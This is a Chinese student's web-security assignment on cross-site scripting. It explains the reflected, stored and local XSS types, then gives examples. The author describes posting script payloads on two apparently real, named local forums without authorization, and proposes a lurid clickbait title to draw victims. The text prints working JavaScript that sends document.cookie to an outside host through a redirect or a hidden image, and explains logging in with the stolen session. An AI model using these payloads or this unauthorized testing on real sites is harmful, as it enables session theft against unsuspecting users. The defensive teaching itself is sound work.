彭克杰-web安全大作业

（XSS跨站脚本攻击课题分析与总结）

班级：13网安四班姓名：彭克杰学号：1315935027指导老师：张鑫

目录：

一、XSS攻击介绍-------------------------------------------1二、XSS漏洞分类-------------------------------------------1三、XSS攻击实例-------------------------------------------2四、XSS的一些传统防御技术---------------------------------9五、综述-------------------------------------------------10

一、XSS攻击介绍

XSS攻击：即跨站脚本攻击(CrossSiteScripting)，为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的特殊目的。

XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(sameoriginpolicy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击，黑客界共识是：跨站脚本攻击是新型的“缓冲区溢出攻击“，而JavaScript是新型的“ShellCode”。

二、XSS漏洞分类

XSS漏洞按照攻击利用手法的不同，有以下三种类型：

1、类型A：本地利用漏洞，这种漏洞存在于页面中客户端脚本自身。其攻击过程如下所示：

Alice给Bob发送一个恶意构造了Web的URL。Bob点击并查看了这个URL。恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在Bob电脑上。具有漏洞的HTML页面包含了在Bob电脑本地域执行的JavaScript。Alice的恶意脚本可以在Bob的电脑上执行Bob所持有的权限下的命令。

2、类型B：反射式漏洞，这种漏洞和类型A有些类似，不同的是Web客户端使用Server端脚本生成页面为用户提供数据时，如果未经验证的用户数据被包含在页面中而未经HTML实体编码，客户端代码便能够注入到动态页面中。其攻击过程如下：

Alice经常浏览某个网站，此网站为Bob所拥有。Bob的站点运行Alice使用用户名/密码进行登录，并存储敏感信息(比如银行帐户信息)。Charly发现Bob的站点包含反射性的XSS漏洞。

Charly编写一个利用漏洞的URL，并将其冒充为来自Bob的邮件发送给Alice。Alice在登录到Bob的站点后，浏览Charly提供的URL。

3、类型C：存储式漏洞，该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞，黑客将攻击脚本上传到Web服务器上，使得所有访问该页面的用户都面临信息泄漏的可能，其中也包括了Web服务器的管理员。其攻击过程如下：

Bob拥有一个Web站点，该站点允许用户发布信息/浏览已发布的信息。Charly注意到Bob的站点具有类型C的XSS漏洞。Charly发布一个热点信息，吸引其它用户纷纷阅读。

Bob或者是任何的其他人如Alice浏览该信息，其会话cookies或者其它信息将被Charly盗走。类型A直接威胁用户个体，而类型B和类型C所威胁的对象都是企业级Web应用。嵌入到URL中的恶意脚本在Alice的浏览器中执行，就像它直接来自Bob的服务器一样。此脚本盗窃敏感信息(授权、信用卡、帐号信息等)然后在Alice完全不知情的情况下将这些信息发送到Charly的Web站点。三、XSS攻击实例

下面的例子我只是简单的注入alert('xss')，至于恶意用户完全可以把alert('xss')换成他想要的任意的js代码，用来发送post或者get请求修改用户的资料，获取用户好友信息，伪造发送私信，甚至做成蠕虫散播到整个web应用，所以千万不要小看了XSS注入攻击带来的后果，并不是alert一个对话框那么简单！

1.实例：XSS注入名城苏州论坛：www.2500sz.com

我打开www.2500sz.com的论坛然后注册了一个帐号，发布一个新话题，输入以下代码：

上面的代码就是输入一个网络分享的图片，我在src中直接写入了

javascript:alert('xss')；操作成功后生成帖子，用IE6、7的用户打开这个我发的这个帖子就会出现下图的alert('xss')弹窗。

当然我会将标题设计的非常吸引人点击，比如“陈冠希艳照又有流出2016版(20P无码)”，这样如果我将里面的alert换成恶意代码，比如：location.href='http://www.xss.com?cookie='+document.cookie；

用户的cookie我也拿到了，如果服务端session没有设置过期的话，我以后甚至拿这个cookie而不需用户名密码，就可以以这个用户的身份登录成功了。这里的location.href只是处于简单这样做，如果做了跳转这个帖子很快会被管理员删除，但是如果我写如下代码，并且帖子的内容也是比较真实的，说不定这个帖子就会祸害很多人：

varimg=document.createElement('img');

img.src='http://www.xss.com?cookie='+document.cookie;img.style.display='none';

document.getElementsByTagName('body')[0].appendChild(img);

这样就神不知鬼不觉的把当前用户的cookie发送给了我的恶意站点，我的恶意站点通过获取get参数就拿到了用户的cookie。当然我们可以通过这个方法拿到用户各种各样的数据。

2.下面这个实例是苏州人社区，我访问www.szr.com社区，这是一个面向于苏州人的sns社区，主要界面是抄袭的新浪微博。注入尝试1：

直接输入